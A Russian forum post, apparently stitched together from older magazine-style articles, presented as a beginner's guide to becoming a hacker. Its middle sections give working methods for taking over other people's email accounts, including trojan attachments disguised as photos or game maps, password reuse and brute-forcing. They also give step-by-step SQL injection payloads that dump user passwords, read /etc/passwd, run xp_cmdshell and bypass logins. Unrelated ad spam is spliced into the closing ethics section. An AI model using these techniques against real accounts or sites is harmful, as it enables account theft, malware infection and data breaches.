Начинающему хакеру

biozz

Убийца Нарушителей
Joined
Jan 18, 2015
Messages
599
Reaction score
410
Age
39
Этот вопрос возникает у многих ребят во время первых исследований сети, программ и алгортимов. Если ты задумался о том, как стать Хакером, и это серьезно, разреши пожать тебе руку - твой исследовательский подход вызывает уважение!

Впервые, я задумался о том, как стать хакером, лет в 17. Уже не помню, что мне сподвигнуло вбить этот запрос в поисовую систему, но догадываюсь, что мои помыслы были не самыми чистыми... С тех пор прошло много лет, я изменился, изменились и мои стремления. Сейчас я увлекаюсь программированием, и создаю серьезные веб-проекты. Команда, благодаря которой был создан этот сайт, развалилась... Да и сама концепция сайта претерпела изменения. Подробней об этом можешь почитать на странице "О проекте". Но мы отвлеклись от вопроса "Как стать хакером?".

На тему хакерства уже создано не мало различных руководств, и я не вижу особого смысла все их переделывать. В задачу этой статьи входит систематизировать данные из многих источников, и составить на их основе одно большое руководство. В итоге, читая его, ты сможешь лучше понять - в какую сторону двигаться, чтобы достичь своей цели - стать Хакером.

Мне лишь остается пожелать тебе крепкого коннекта на твоем большом и интересном пути.

Основные навыки хакера

1. Изучай программирование.

Без этого навыка очень трудно стать хакером. И если тебе кажется, что программирование это очень сложно - не правда. Базовые нвыки программирования можно получить самостоятельно за несколько упорных дней, проведенных перед монитором, в изучении соответствующих статей. Лично меня никто никогда не учил программированию, просто в 17 лет я почувствовал стремление к написанию собственных программ. И учился самостоятельно, проводя ночи в изучении книг и чтении статей. С тех пор я перестал тратить время на компьютерные игры, и компьютер стал моим рабочим местом.

Именно рабочим. Весь мой заработок идет из Интернета. Вспоминая, сколько дней я убил на игры, мне становится жалко потерянного времени.

2. Приручи Интернет

Может быть, ты виртуозно владеешь Сетью, общаешься в социалках, и имеешь свой сервер CS с друзьями. Но это все фигня... Ты должен понимать, как устроен Интернет, разбираться во взаимодействии сервера и браузера, знать значение заголовков (HTTP) передаваемых серверу клиентом. Без этих знаний ответ на вопрос как стать хакером не найти.

Изучи историю Интернет, освой базовые понятия, научись понимать, что такое IP, Proxy. Это важно, правда.

3. Освой язык Гипертекстовой разметки.

Это самое первое, что ты должен сделать. Я говорю про HTML в связке с CSS. Может быть ты и делал сайты на ucoz либо на narod.ru используя стандартные шаблоны, но назвать это сайто строением нельзя ни в коем случае.

Сам HTML тебе понадобится не только для того, чтобы создавать собственные сайты, но и для того, чтобы взаимодействовать с сервером, и обращаться к php скриптам, не смущаясь от строк вида:

input autocomplete="off" class=lst type=text name=q maxlength=2048 value="как стать хакером"

4. Не задавай глупых вопросов

Я про хакерские форумы и сайты, а также про сервисы типа "Вопрос-Ответ" от Гугла. В Интернете полно информации, и ты в силах многое изучить самостоятельно.

Если же наступил момент, когда действительно нужна помощь, запомни несколько правил:

- будь вежлив. Ты просишь помощи у более опытных людей, и никто ничего тебе не обязан.

- раскрой вопрос. Выложи результаты своих поисков, и то, чего ты добился, чтобы люди поняли, что ты уже совершал самостоятельные попытки в поисках ответа на свой вопрос.

- напиши правильное решение. Если ты самостоятельно нашел ответ на свой вопрос, не нужно писать что-то типа: "Всем спасибо, проблема решена, сам справился." Помни, что твою ветку форума будут находить через поиск люди, которые еще не нашли ответа на этот вопрос. Подумай об этом, когда закрываешь тему - выкладывай правильное решение.

5. Изучай английский.

Английский язык - общепринят в Интернет. И пусть мы обзавелись собственным доменом типа .рф, но от инглиша никуда не уйти.

Для всех мировых сервисов, английский язык - это стандарт. И чем раньше ты начнешь его изучать, тем лучше для тебя.

6. Помогай новичкам.

Пускай ты пока и не так много знаешь, но не нужно скрывать информацию от других ребят, знания которых на уровне, много меньшем чем у тебя. Представь, что все на свете скрывали бы необходимую информацию, многому ли тогда ты бы научился?

Это касается и твоих будущих программ.. Не скрывай исходные коды от других. Пиши Open Source приложения, ведь это двигатель прогресса.

7. Освой базовые навыки взлома
Затем, можешь изучить Технологию XSS атак. Но тебе уже понадобятся знания HTML и немного PHP.

Изучи, как нужно скрывать следы после взлома. В первую очередь. Для начала можешь прочитать статью про Анонимность в сети. Если интересно, можешь почитать, как нестандартными способома украсть ICQ: Атака на ICQ



Поверь, хочешь жить спокойно, лучше не начинать…

Но я все-таки очень хочу, что же делать?

Ну что ж, тогда стоит начать с того, чтобы не задавать этот вопрос в форуме.

Сперва определимся, кто такой хакер: это существо, у которого есть компьютер (ну это обязательно), две руки (одна для мышки, другая, конечно же, для пива), голова (для наушников), и холодильник (ну пиво же не теплым пить!). Если у тебя все это есть, значит у тебя есть все шансы стать настоящим хакером ;) Ах, да, чуть не забыл, еще у хакера должен быть нестандартный образ мышления!

Зачем хакеру нестандартный образ мышления?

Все очень просто. Хакер на «ты» с компьютером и с Интернетом, а значит, не нуждается ни в чьей помощи – всю информацию он умеет находить в поисковых ресурсах. Если ты усвоишь эту простую истину, то сможешь быстро добиться успехов. Поверь, базы yandex.ru и google.ru содержат ответы на 90% вопросов, так что если не хочешь ждать несколько дней ответа, используй это преимущество. В этом и есть их «маленький секрет»; откуда они так много знают. И вообще не бойся быть оригинальным!

Эх.. а я такой ламер, что даже поисковиками пользоваться не умею.

Стоп. Ламер – только тот, кто ничего не делает. Помнишь про 90%? Никогда не забывай эту цифру. Заходим на yandex.ru, вводим запрос «Поиск информации с помощью поисковиков» и вуаля – попадаем на страницу Link removed, где все подробно описано, как искать и где. Читай, и через 15 минут будешь специалистом по поиску в сети. :)

Но если все можно найти, зачем же тогда форум?

Во-первых, форум - это сообщество, люди, объединенные общими интересами. Они обсуждают все, начиная от погоды, и заканчивая интересными взломами, но это не значит, что они с радостью будут разбираться с твоей проблемой.

Во-вторых, вспомни еще разок про 90%. Остается 10% вопросов, ответов на которые действительно пока нет в поисковиках, либо они так хорошо запрятаны, что ни за что не отыскать. Что ж, тогда у тебя есть все шансы задать свой вопрос первым. Раз он еще не встречался, скорей всего, твои потомки, столкнувшиеся с такой же проблемой, будут попадать именно на твою тему. Поэтому постарайся задать его правильно.

Как же спросить правильно?

Замечательная статья про то, как задавать вопросы: ln.com.ua/~openxs/articles/smart-questions-ru.html. Постарайся прочитать хотя бы ключевые моменты, это сильно повысит шанс, что тебе ответят и помогут.

Блин, а я вот спросил на форуме, но мне не ответили даже через неделю. Да они там сами ничего не знают!!!

Значит, ты так и не прочитал эту замечательную статью: ln.com.ua/~openxs/articles/smart-questions-ru.html. Потрать 10-15 минут, чтобы потом не терять дни… Поверь, оно стоит того.

Если же у тебя не получается даже это, давай не будем становиться хакерами, ок? :)

Какие самые популярные сайты по взлому?

Вот некоторые из них:
securitylab.ru
antichat.ru
web-hack.ru
hackzona.ru
XakNet.ru
xakep.ru
void.ru
security.nnov.ru
anonymous.ru
inattack.ru
emanual.ru
sources.ru
codenet.ru

В сети действительно много информации для новичков, но там столько терминов! Что такое сплойт, прокси, IP, дефейс и т.п.?

Во-первых, многие непонятные слова можно узнать тут: http://www.xakep.ru/magazine/xa/049/024/1.asp.

Кроме того, есть один универсальный способ: Открываем yandex.ru, и пишем там, например, «что такое прокси». Кстати, ты сможешь познакомиться с зачатками искусственного интеллекта этого поисковика, увидев, как он преобразует твой запрос в «прокси – это…». Поэтому не стесняйся задавать ему вопросы типа «что такое …», он все знает. Пусть это будет наш секрет :)

Какими необходимыми знаниями нужно обладать, чтобы стать хакером?

Во-первых, нужно здорово разбираться хотя бы в одной из операционных систем, Windows, либо *nix. Знать хотя бы основные shell-команды, причем как Windows, так и *nix

Очень желательно знание одного из интерпретируемых языков, лучше всего PHP или perl.

Без знаний HTML, javascript, CSS придется очень туго.

Весьма пригодится умение писать Windows-программки. Соответственно, это C/C++, Delphi или Visual Basic.

Умение быстро находить интересующую тебя информацию в поисковиках будет несомненным плюсом. Знание принципов функционирования компьютера, сетей и Интернета в целом. Конечно, все это не охватить сразу, начни с чего-нибудь одного и осваивай постепенно. Со временем поймешь сам, что пригодится, а что нет

Я слышал, что все хакеры не пользуются Windows это правда?

Не совсем. Дело в том, что большинство серверов - это unix системы. Именно поэтому чем лучше ты будешь знать никсы, тем больше тебе будет «везти» во взломах. А самый лучший способ узнать систему – поставить ее себе на комп. Кроме того, Unix очень привлекателен эффективной работой с сетью. Некоторые технологии, успешно реализованные в никсах, Windows даже не поддерживает, в то время, как отдельные программы вроде Corel Draw пока не имеют аналогов в *nix. Так что в какой ОС работать, это, в принципе, кому как удобней. Если есть желание познакомиться с каким-нибудь никсом, но не хочешь расставаться с Windows, то можешь оставить ее и поставить Linux как дополнительную ОС.




Наверное, я тебя разочарую, но почту mail.ru, или на yandex.ru взломать нельзя. Почему?

http://mail.ru, пожалуй, самая популярная почтовая система. Администрация серверов mail.ru имеет огромные доходы с рекламы, они завлекают пользователей рекламой в печатных изданиях и по телевидению, неужели ты думаешь, они пожалеют денег на хороших специалистов по безопасности? Забудь об этом. И, самое главное, никогда не ведись на предложения «взломать любое мыло на mail.ru за $5» - тебя самым наглым образом кинут. Способов дурачить лохов куча. Самый распространенный – «найден секретный почтовый робот, сообщающий пароль от любого ящика, если прислать ему свой пароль», также предлагают различные проги для взлома ящика «100% работающие и всего за $25».

Однако стоп, не все так печально. Что? Я сказал, почту на mail.ru нельзя взломать? Я пошутил :)

Если нельзя найти баг в самом сервере, почему бы не найти его в голове владельца ящика? Итак, внимание, самые распространенные способы взлома почты на mail.ru. Само собой, они катят и для других почтовиков.

Что ж, приступим:

1. Первым делом стоит попробовать подобрать ответ на секретный вопрос. Вероятность мала, но попробовать стоит. К примеру, ответом на "любимое блюдо" чаще всего бывают "шашлык", или "пельмени".

2. Допустим, мыло [email protected]. Ищешь в поисковиках (достаточно Яндекс, Гугл и Рамблер) все сайты, где он засветился, выписываешь все ники, под которыми он гуляет по сети и все сайты, на которых он зарегистрирован под этими никами. Конечно, если логин типа alex, то ничего не выйдет, нужен уникальный

После этого исследуешь все найденные сайты. Если человек давно существует в сети, более чем вероятно, что год-другой назад он зарегился со своим паролем на каком-нибудь superforum2.h14.ru, взломать который не составит большого труда. Пароль от аккаунта на форуме часто совпадает с паролем от мыла.

3. Отсылаем человеку троянца в надежде, что он ламер ушастый и клюнет на superFoto.jpg.............exe. Отослать можно запароленный архив csmaps.zip от имени его друга, сказав, что там новая крутая карта CS. Пароль указать в письме. Как правило, юзеры проверяют запароленный архив антивирем, а потом без палева открывают его и запускают exe-шник . Для этих целей вполне подойдет троян Pinch.

4. Допустим, ничего не помогло. Человек следит за мылом, меняет пароли и т.д.

Не все потеряно. Снова идем на страницу вспоминания пароля mail.ru и ищем, нет ли там ретрива пасса на мыло. Есть? Тогда можно попытаться узнать второе мыло и повторить всю процедурку с начала. Возможно, его человек охраняет не так ревностно.

Как взломать мыло на менее защищенных почтовиках: newmail, hotmail…?

1. Приятней всего найти багу самому: например, уязвимость в веб-интерфейсе: возможно, где-нибудь спряталась XSS, или даже SQL-inj.

2. Если админы до сих пор не почесались сделать защиту от брута, можно попытаться сбрутить пароль. Для этого есть тулзы, например, старый добрый Brutus AET под Windows, либо THC-Hydra под никсы.

3. Использовать методы соц-инженерии, описанные для mail.ru




Львиная доля современных web-приложений использует для хранения больших объемов информации базы данных. Практически все языки программирования, используемые на стороне сервера, поддерживают работу с базами данных, а обеспечивает интерфейс взаимодействия между языком программирования и хранилищем данных система управления базой данных (СУБД), которая осуществляет управление базой на низком уровне.
Наибольшее признание у web-разработчиков получили СУБД MySQL, PostgreSQL, Microsoft SQL. Для обращения к СУБД используется специальный структурированный язык запросов под названием SQL(Structured Query Language).
SQL-injection (SQL-инъекция, вторжение) – это метод получения доступа к данным сервера посредством подмены части определенного SQL-запроса на код злоумышленника.
Смысл данной атаки заключается в нахождении и использовании ошибки разработчика на стыке двух технологий - web и SQL приглашение для иностранцев . При обработке данных, приходящих от пользователя, большинство скриптов на основании этих данных формирует запрос к базе, при отсутствии всевозможных проверок и должной защитной фильтрации, очень легко получить доступ к базе подменой ожидаемых данных на код взломщика.
Например, рассмотрим распространенную уязвимость (в связке PHP/MySQL) сайтов недобросовестных разработчиков по шагам. У нас есть рабочий URL:
www.site.ru/index.php?id=123
Проверим его на наличие фильтрации, подставив в конец кавычку:
www.site.ru/index.php?id=123’
Сайт с защитной фильтрацией должен выдать ошибку, но если ошибки нет, это не значит, что сайт уязвим, возможно, просто вывод ошибок в браузер запрещен в настройках сервера. Чтобы полностью удостовериться в наличии уязвимости подставим арифметическое выражение:
www.site.ru/index.php?id=124-1
Если теперь в окне браузера будет выведена страница в таком же виде как
www.site.ru/index.php?id=123
,значит, выражение было выполнено и сценарий не отфильтровал его – это говорит о том, что уязвимость присутствует.
Теперь необходимо определить из какого поля таблицы выводятся данные в браузер. Для этого вводим такой код:
www.site.ru/index.php?id=123 +union+select+1,2,3,4,5,6,7,8/*
Если в браузере выведется цифра 5 – значит, выводится значение 5 поля. Воспользуемся этим значением, попробуем выполнить команду и выяснить версию SQL:
www.site.ru/index.php?id=123 +union+select+1,2,3,4,version(),6,7,8/*
В браузере выведется номер версии SQL. Можно узнать имя пользователя базы данных:
www.site.ru/index.php?id=123 +union+select+1,2,3,4,user(),6,7,8/*
Выведется имя пользователя базы, например user@localhost. Также легко выясняем имя базы данных такой командой:
www.site.ru/index.php?id=123 +union+select+1,2,3,4,database(),6,7,8/*
Получим имя базы, например bd_site.
Теперь попробуем получить имя пользователя из таблицы, в которой хранятся данные о пользователях.
Необходимо методом "научного тыка" выяснить имя этой таблицы, предположим users. Пробуем ввести следующий URL:
www.site.ru/index.php?id=123 +union+select+1,2,3,4,name,6,7,8 +from+users+limit+1,1
Если имя таблицы введено правильно, то в браузере появится имя первого пользователя из таблицы, к примеру, admin. Теперь можно узнать его пароль:
www.site.ru/index.php?id=123 +union+select+1,2,3,4,password,6,7,8 +from+users+limit+1,1
Через такую дырку в защите можно даже читать файлы с сервера:
www.site.ru/index.php?id=123 +union+select+1,2,3,4, loаd_filе(/еtc/pаsswd),6,7,8/*
Мы получим содержимое стандартного файла паролей в каталоге /etc, для семейства UNIX-подобных систем.
Все выше перечисленные действия принципиально не отличаются в СУБД MySQL, PostgreSQL и MS SQL Server. Но в MS SQL Server еще проще получить пароли, если упущена должная фильтрация. Исполняя команды на сервере при помощи ехес mаstеr..хp_сmdshеll, можно подключиться к некоторому IP по Telnet'у, вместо пароля или логина вставив:
'; еxеc mаstеr..xp_cmdshеll 'tеlnеt 192.168.0.12' --
Для защиты от подобного типа вторжений необходимо использовать фильтры, предоставляемые производителями СУБД. Необходимо так же разрабатывать свои собственные решения для защиты – самодельные фильтры и проверки, активно используя регулярные выражения (в PHP много интересных функций для работы с ними).

Очень часто для того, чтобы скачать с какого-либо ресурса файл или получить возможность использовать какой-нибудь сервис, от нас требуют регистрацию. Все бы ничего, но вот регистрироваться за деньги это уже слишком, поэтому давайте рассмотрим один из вариантов получения доступа по шагам. Распространенная схема авторизации на PHP в связке с MySQL обычно выглядит примерно так:
$result=mysql_db_query($DB,"SELECT * FROM $table WHERE name='$login' AND
password='$pass'");
$numRows=mysql_num_rows($result);
mysql_close($link);
if ($numRows!=NULL)
{
// код, выполняемый в случае успешной авторизации
// ( когда логин и пароль введены верно )
else
{
// код, выполняемый в случае непрохождения авторизации
// ( введенные логин и пароль не соответствуют )
}

При вводе данных в форму авторизации, формируется запрос примерно такого содержания:
http://www.site.ru?login=ivan&pass=12345
Затем скрипт, обрабатывающий данные формы авторизации, формирует SQL запрос следующего вида:
SELECT * FROM users WHERE login='ivan' AND pass='12345'
После выполнения такого запроса функция mysql_db_query() вернет все записи из таблицы "users" с логином "ivan" и паролем "12345". Из приведенного в начале кода видно, что при наличии в базе пользователя с такими данными, перейдет управление к блоку кода, выполняемому в случае успешной авторизации. Авторизоваться на таком сайте можно и без пароля, при отсутствии в скрипте авторизации экранов и всевозможных фильтров, исключающих выполнение посторонних SQL-инструкций. Попробуем указать в качестве пароля строку:
12345’ AND id=’21
В этом случае сформируется запрос следующего вида:
SELECT * FROM users WHERE login='ivan' AND password='12345' AND id='21'
Получается, что теперь авторизация будет успешной лишь в том случае, если совпадут не только логин и пароль, но и идентификатор пользователя. Легко догадаться, что теперь при помощи логического оператора OR, мы можем добавить инструкцию, которая всегда будет возвращать true. Для этого введем в поле логина строку:
ivan’ OR 1=1--‘
Сформируется запрос следующего вида:
SELECT * FROM users WHERE login='ivan' OR 1=1--' AND pass='12345'
Для тех, "кто в танке", поясню, что последовательность "--" говорит о конце запроса, поэтому вся последующая часть SQL-инструкции выполняться не будет. В результате, какой бы логин мы ни ввели, а тем более пароль, будет выполняться блок кода успешной авторизации. Теперь мы авторизованные пользователи ресурса и можем качать все, что нам нужно и пользоваться всеми привилегиями.
Все это хорошо, но это общий случай. В каждом отдельном случае, мы не можем знать в какой последовательности и как, формируется запрос к базе. Поэтому придется вводить конструкции типа "ivan’ OR 1=1--" в каждое поле формы авторизации. Обязательно проверьте форму авторизации на наличие hidden полей. Если они существуют, необходимо сохранить HTML-страницу и подставить в ее код нужные значения hidden полей, после чего запустить, не забыв при этом указать полный путь к скрипту-обработчику формы авторизации в теге .
Необходимо не забывать и о том, что у разных программистов разные стили, кто-то использует в запросах ‘, кто-то “, а некоторые вообще обходятся без них, поэтому и SQL-инъекции могут выглядеть так:

' OR 1=1--
" OR 1=1--
OR 1=1--

Не исключено и использование в запросах круглых скобок, например:
SELECT * FROM users WHERE (login='ivan' AND pass='12345')
В этом случае можно попробовать такой вариант:
') OR ('a'='a
Главное при подборе нужной инструкции опробовать как можно больше вариантов, и тогда удача вам обязательно улыбнется :).

Пример уязвимого скрипта, демонстрирующего пример с авторизацией:

1. <?php
2. ini_set('error_reporting', E_ALL);
3. ini_set('display_errors', 'on');
4. mysql_connect('localhost', 'h4ck3r', 'h4ck3r');
5. mysql_select_db('hack');
6. if ($_POST) {
7. $sql = "SELECT * FROM `users` WHERE `login`='".$_POST['login']."'".
8. " AND `passwd`='".md5($_POST['pass'])."'";
9. $user_res = mysql_query($sql);
10. $user = array();
11. if (!$user_res) {
12. echo "Fail";
13. } else {
14. $user = mysql_fetch_array($user_res);
15. }
16. }
17.
18. if ($user) {
19. ?>
20. Hello, <?=$user['login']?>.
21. <?php
22. } else {
23. if ($_POST) {
24. ?>
25. <?=$_POST['login']?> is not valid login.
26. <?php
27. }
28.
29. ?>
30. <form method="post">
31. Login: <input type="text" name="login"/><br/>
32. Pass: <input type="text" name="pass"/><br/>
33. <input type="submit" value="enter"/>
34. </form>
35. <?php
36. }
37. /*
38. --
39. -- Table structure for table `users`
40. --
41.
42. CREATE TABLE IF NOT EXISTS `users` (
43. `id` int(11) NOT NULL AUTO_INCREMENT,
44. `login` varchar(32) NOT NULL,
45. `passwd` varchar(32) NOT NULL,
46. PRIMARY KEY (`id`),
47. UNIQUE KEY `login` (`login`)
48. ) ENGINE=MyISAM DEFAULT CHARSET=UTF-8 AUTO_INCREMENT=2;
49.
50. --
51. -- Dumping data for table `users`
52. --
53.
54. INSERT INTO `users` (`id`, `login`, `passwd`) VALUES
55. (1, 'shadie', '202cb962ac59075b964b07152d234b70'),
56. (2, 'test', 'test');
57.
58. */
59.
60. /*
61. * sample data:
62. * 1. Вход под известным логином
63. * login : shadie' OR '1'='1
64. * либо login: shadie' --
65. * > Hello, shadie
66. *
67. * 2. Вход под первым логином в базе
68. * login : ' OR 1 LIMIT 1 --
69. * > Hello, shadie
70. *
71. * 3. Перебор логинов в базе (M - число-смещение от начала таблицы)
72. * login : ' OR 1 LIMIT M,1 --
73. * > (M == 1) Hello, test
74. *
75. * 4. Получение хэша пароля
76. * login : ' UNION SELECT `id`, `passwd` AS 'login', `passwd` FROM `users` --
77. * > Hello, 202cb962ac59075b964b07152d234b70.
78. * (LIMIT используется так же как и в предыдущем случае)
79. *
80. */
81. ?>



Это, мой друг, пожалуй, самое главное в хакинге – соблюдать кое-какие неписанные правила приличия. Изучая сетевую безопасность (хорошо, тщательно изучая), ты открываешь для себя много интересных, полезных вещей, овладеваешь определенными навыками… Несомненно, некоторые из них приподнимают тебя на пару ступенек выше (в этой области, а не вообще, в жизни) среднестатистического пользователя интернет, завсегдатая чатов и т.п. Вместе с этим, появляется (особенно в самом начале пути) огромное желание этими навыками воспользоваться. А именно: взломать icq, e-mail, угнать чужой аккаунт, задефейсить сайт, повесить сервер, слить ценную базу данных какого-либо ресурса, выпустить в свет собственноручно написанный вирус. Конечно, без этого никуда, никто не спорит, но… обычно это влечет за собой какие-либо цели, иногда корыстные, иногда не очень. Надо четко понимать – с какой именно целью, я сейчас трояню чужую машину, поняв это нужно взвесить все «за» и «против», надо ли? Стоит ли доставлять столько неприятностей человеку, только лишь ради того, чтобы испытать чувство собственного превосходства, выводя на рабочий стол оскорбительное сообщение, или перезагружая его компьютер? Очевидно, что нет.

Конечно, когда ты вскакиваешь со стула, потирая руки, видя что атака удалась – это чувство сложно с чем либо сравнить, согласен. И тебе все равно, что творится «по ту сторону монитора», ты все равно не видишь как расстроен человек, как он тоже вскакивает со стула, проклиная все на свете. Нанесенный вред может быть непредсказуем Мы предлагаем: пакеты из полипропиленовой пленки Кемерово . Это мог быть важный сервер, который потеряет в следствии некорректного завершения работы часть своих данных, а мог быть и простой парень, в поте лица работавший над своей курсовой работой, которую ему предстоит завтра сдавать, словом, неприятных моментов может быть куча. А что дальше…? Все. Ты удовлетворен, твой оппонент расстроен. Вечер для тебя прошел удачно…

Совсем по другому могла разрешится эта ситуация, если ты не воспользовался брешью в безопасности системы атакуемого компьютера, а найдя, сообщил о ней владельцу уязвимого компьютера, заодно и посоветовав как ее исправить. В этом случае, ты Хакер, с большой буквы, и я снимаю перед тобой шляпу. Поступив по второму сценарию, ты заработаешь восхищение, уважение, не говоря уже о самоудовлетворении. Поверь – это стоит многого Детальное описание мини купер джип на нашем сайте. . Со спокойной душой ты можешь открыть банку пива, и глядя в монитор, знать, твой поступок был правильным от начала и до конца. Слово даю!

Это статья была написана, как говорится «за одну затяжку». Потому что, наблюдая тенденции, которые имею место в нашей стране, когда начинающие хакеры ( хакеры или вандалы?) готовы запустить какую-либо программу взлома, из огромного ассортимента (кстати, написанную не ими), только от того что где-то человек им не угодил, где-то человек им не понравился, где-то «срочно нужно прочитать не общается ли он с моей девушкой» (цитата с форума), становится очень и очень грустно. Я совсем не намекаю про святость хакеров, когда ломаются целые системы, в поисках наживы, в поисках информации. Нет-нет. Дело не в поступке. В последнем случае хакер делает работу, он применяет свои знания вовсе не для баловства, и готов поспорить, совесть у него есть. Может к нынешним хакерам это озарение придет с возрастом, не знаю… Просто от всей души хочется, чтобы наши ребята направляли знания в нужное русло, повышали квалификацию, изучали сетевую безопасность, программирования для дальнейших перспектив, для возможности самореализовать себя. Ведь легальных способов применить знания ой как много… И все они очень хорошо оплачены. Поверь, быть Хакером в истинном значении этого слова (не понял? Почитай историю развития ЭВМ и эволюцию этого термина) это действительно круто!

Я не святой апостол, чтобы склонять людей к добру, я всего лишь описал две возможности применения знаний. Какой путь изберешь ты, тебе и решать. Если ты согласен со всем, что тут написано, я респектирую тебе от всей души, если же нет… может ты и прав. Спорных моментов тут действительно много.
 
Last edited by a moderator:

Evolinte

Member
Joined
Mar 7, 2015
Messages
211
Reaction score
40
Age
34
Это выдержка из журнала "Хакер"?Очень похоже на то.И вот как раз по теме.У тебя случайно нет старых архивов журнала "Хакер"?Не могу найти в интеренете.
 
Top